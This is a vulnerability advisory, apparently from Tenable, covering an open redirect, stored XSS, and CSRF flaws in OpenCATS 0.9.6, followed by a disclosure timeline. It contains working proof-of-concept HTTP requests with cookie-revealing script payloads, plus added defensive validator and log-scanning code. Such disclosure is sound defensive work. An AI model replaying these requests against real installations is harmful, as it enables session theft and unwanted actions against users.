
Multiple Vulnerabilities in OpenCATS 0.9.6

High

Synopsis

Open Redirect

AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N 7.3/6.9

CWE: 601

OpenCATS is vulnerable to a template injection issue caused by improper validation of user-supplied GET parameters.

The request shown below is an example of what a victim would be served. The user is directed away from their intended site to a potentially malicious one, here ‘https://tenable.com/’.

This vulnerability is found in SettingsUI.php, where the ‘url’ GET parameter is passed through as the value of the HTML frame source in the template.

Because this value is not sanitized, JavaScript can also be passed in the parameter and will be executed when the page renders.

Proof of concept

To reproduce this issue, send the below request to the target.

GET /index.php?m=settings&a=previewPage&url=https://tenable.com HTTP/2
Host: <your address>
Cookie: CATS=<your CATS session token here>
 

You will then see that you are redirected to the tenable.com domain.
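The check that the preview page lacks, written here as an added Python example (not OpenCATS code; the real fix would live in the PHP of SettingsUI.php). The application hostname and fallback page are placeholders: only absolute paths within the application, or http(s) URLs on that host, are accepted as the frame source, which rejects off-site redirects, scheme-relative `//host` forms and `javascript:` URLs alike.

```python
import html
from urllib.parse import urlsplit

# Hypothetical values (assumed, not from the advisory or OpenCATS): the host
# the application is served from, and the page to fall back to when the
# requested preview URL is rejected.
APP_HOST = "cats.example.internal"
FALLBACK = "/index.php?m=settings"


def is_safe_preview_url(raw: str, app_host: str = APP_HOST) -> bool:
    """True only if `raw` may be used as the preview frame's source."""
    if not raw or any(c in raw for c in "\x00\t\r\n "):
        return False
    # Browsers treat backslashes as slashes, so "/\host" is really "//host".
    candidate = raw.replace("\\", "/")
    try:
        parts = urlsplit(candidate)
    except ValueError:  # e.g. a malformed IPv6 literal
        return False
    if parts.scheme:
        # Absolute URL: only http(s), and only on our own host. This also
        # rejects javascript:, data: and similar schemes.
        if parts.scheme.lower() not in ("http", "https"):
            return False
        return (parts.hostname or "").lower() == app_host.lower()
    if parts.netloc or candidate.startswith("//"):
        # Scheme-relative "//host/..." (and "///host") always leaves the site.
        return False
    # Relative reference: require an absolute path inside the application.
    return candidate.startswith("/")


def preview_frame_src(raw: str, app_host: str = APP_HOST) -> str:
    """Attribute-safe frame source: the validated URL escaped for an HTML
    attribute, or FALLBACK when the input is rejected."""
    if not is_safe_preview_url(raw, app_host):
        return FALLBACK
    return html.escape(raw, quote=True)
```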

Unauthenticated Stored XSS

AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L 8.3/7.9

CWE: 79

It was noted during testing that the target is vulnerable to stored cross-site scripting due to insufficient sanitization of questionnaire answers in the candidate application form.

An unauthenticated attacker could exploit this issue by submitting malicious JavaScript as the answer to a questionnaire, which would then be executed when an authenticated user reviews the candidate's submission. This could be used to steal other users’ cookies and force users to perform actions without their knowledge.

Proof of concept

To reproduce this issue, send the below request to the OpenCATS target. Note: you will need to change the target IP address in the Host header to that of your own target.

POST /careers/index.php?m=careers&p=onApplyToJobOrder&questionnairePostBack=1 HTTP/2
Host: <OpenCATS address>
Content-Length: 2070
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydgDyvVK05zEW6FFY
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://<OpenCATS Address>/careers/index.php?m=careers&p=onApplyToJobOrder

------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="ID"

1
------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="candidateID"

-1
------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="applyToJobSubAction"
 

------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="file"
 

------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="resumeContents"

test

------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="firstName"

Gimli
------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="lastName"

Gimli
------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="email"

[email protected]
------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="emailconfirm"

[email protected]
------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="phoneHome"
 

------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="phoneCell"
 

------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="phone"
 

------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="bestTimeToCall"

test
------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="address"
 

------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="city"

test
------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="state"

test
------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="zip"

test
------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="keySkills"

test
------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="questionnaire1Question1"

<script>alert(document.cookie)</script>

------WebKitFormBoundarydgDyvVK05zEW6FFY--

When the submission is browsed to, the application executes the injected JavaScript in the reviewing user’s browser.

Authenticated Stored XSS

AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:L 6.4/6.1

CWE: 79

It was noted during testing that the target is vulnerable to stored cross-site scripting due to insufficient sanitization of the description when creating a calendar event.

An authenticated attacker with access to a restricted account could exploit this issue by submitting malicious JavaScript as the description of a calendar event, which would then be executed in other users' browsers when they browse to that event. This could result in stealing session tokens from users with higher permission levels or forcing users to perform actions without their knowledge.


Proof of concept

To reproduce this issue, send the below request to the OpenCATS target. Note: you will need to add your own CATS session token and change the target IP address in the Host header to that of your own target.

POST /index.php?m=calendar&view=MONTHVIEW&month=11&year=2022&week=-1&day=-1&a=addEvent HTTP/2
Host: <OpenCATS address>
Cookie: CATS=<Your CATS session token>
Content-Length: 278
Origin: https://<OpenCATS Address>
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36

postback=postback&title=test&type=600&publicEntry=on&dateAdd=11-22-22&allDay=1&sendEmail=admin%40testdomain.com&reminderTime=15&description=%3Cimg+src%3D%22https%3A%2F%2F<OpenCATS Address>%2Fimages%2FapplicationLogo.jpg%22+onload%3D%22alert%28document.cookie%29%22%3E&submit=Add+Event

When a user browses to the calendar event, the application executes the injected JavaScript in the user's browser.

Cross-site request forgery

AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L

CWE: 352

There is no CSRF protection in this application; the POST requests shown in this advisory carry no CSRF token.

An attacker could exploit this issue by creating a page that uses JavaScript to submit requests in an authenticated user's session when that user is tricked into visiting it. Some actions in this application are triggered purely by GET parameters, however, so for those the attacker would only need to trick an authenticated user into browsing to a specific URL.

Proof of concept

If an authenticated user browses to the URL below, an email is sent to the specified address. Note that the fromAddress parameter has to use the domain of the OpenCATS installation, but the local part (the username) can be anything you like.

https://<opencats address>/ajax.php?f=testEmailSettings&testEmailAddress=<target email address>&fromAddress=<your from address>
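As an added detection example (not from the advisory or the OpenCATS project), the following Python scans combined-format web-server access logs for the two GET-driven actions described in this advisory: previewPage requests whose url parameter points off-host, and testEmailSettings calls whose Referer is not the application itself, which is the trace a cross-site trigger of that GET leaves behind. The hostname and the log lines are constructed placeholders.

```python
from __future__ import annotations
import re
from urllib.parse import parse_qs, urlsplit

APP_HOST = "cats.example.internal"  # hypothetical OpenCATS hostname (assumed)

# Combined log format: client ident user [time] "METHOD PATH PROTO" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines: an in-app preview, an off-site previewPage redirect, a
# testEmailSettings call arriving from a foreign page, and one issued from the app itself.
SAMPLE_LOG = [
    '10.0.0.5 - - [27/Feb/2023:10:00:01 +0000] "GET /index.php?m=settings&a=previewPage&url=/careers/index.php HTTP/1.1" 200 512 "https://cats.example.internal/index.php?m=settings" "Mozilla/5.0"',
    '10.0.0.9 - - [27/Feb/2023:10:00:07 +0000] "GET /index.php?m=settings&a=previewPage&url=https://tenable.com HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [27/Feb/2023:10:01:12 +0000] "GET /ajax.php?f=testEmailSettings&testEmailAddress=victim%40example.org&fromAddress=hr%40cats.example.internal HTTP/1.1" 200 77 "https://lure.example/page.html" "Mozilla/5.0"',
    '10.0.0.5 - - [27/Feb/2023:10:02:00 +0000] "GET /ajax.php?f=testEmailSettings&testEmailAddress=admin%40cats.example.internal&fromAddress=hr%40cats.example.internal HTTP/1.1" 200 77 "https://cats.example.internal/index.php?m=settings&a=administration" "Mozilla/5.0"',
]

def _offsite(url: str) -> bool:
    # True if `url` would take the browser off APP_HOST or is not http(s).
    norm = url.replace("\\", "/")  # browsers treat backslashes as slashes
    try:
        p = urlsplit(norm)
    except ValueError:
        return True
    if p.scheme and p.scheme.lower() not in ("http", "https"):
        return True  # javascript:, data:, ...
    host = (p.hostname or "").lower()
    # scheme-relative "//host" (and "///host") leaves the site even when urlsplit reports no host
    return (not p.scheme and norm.startswith("//")) or (bool(host) and host != APP_HOST)

def classify(line: str) -> str | None:
    # Label one access-log line, or None if it matches neither pattern.
    m = LOG_RE.match(line)
    if not m:
        return None
    req = urlsplit(m["path"])
    q = parse_qs(req.query)
    if req.path.endswith("/index.php") and q.get("m") == ["settings"] and q.get("a") == ["previewPage"]:
        if any(_offsite(u) for u in q.get("url", [])):
            return "open-redirect-attempt"
    if req.path.endswith("/ajax.php") and q.get("f") == ["testEmailSettings"]:
        # This GET sends mail, so it should only come from the app's own pages; "-" (no Referer) is ambiguous but worth a look.
        if not m["referer"].lower().startswith((f"https://{APP_HOST}/", f"http://{APP_HOST}/")):
            return "cross-site-testEmailSettings"
    return None

def scan(lines: list[str]) -> list[tuple[int, str]]:
    return [(n, lab) for n, lab in ((n, classify(l)) for n, l in enumerate(lines, 1)) if lab]
```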

Disclosure Timeline

November 24, 2022: Tenable notifies vendor
November 29, 2022: Tenable sends second notification to vendor
December 6, 2022: Vendor acknowledges, requests further information
January 16, 2023: Additional information provided to vendor
February 27, 2023: Disclosure deadline expired, publishing TRA

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

Tenable Advisory ID: TRA-2023-8
Credit:
Derrie Sutton
CVSSv3 Base / Temporal Score:
8.3/7.9
CVSSv3 Vector:
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L 
Affected Products:
OpenCATS version 0.9.6
Risk Factor:
High

Advisory Timeline

February 27, 2023: Advisory Published
March 1, 2023: CVSS vector for open redirect updated
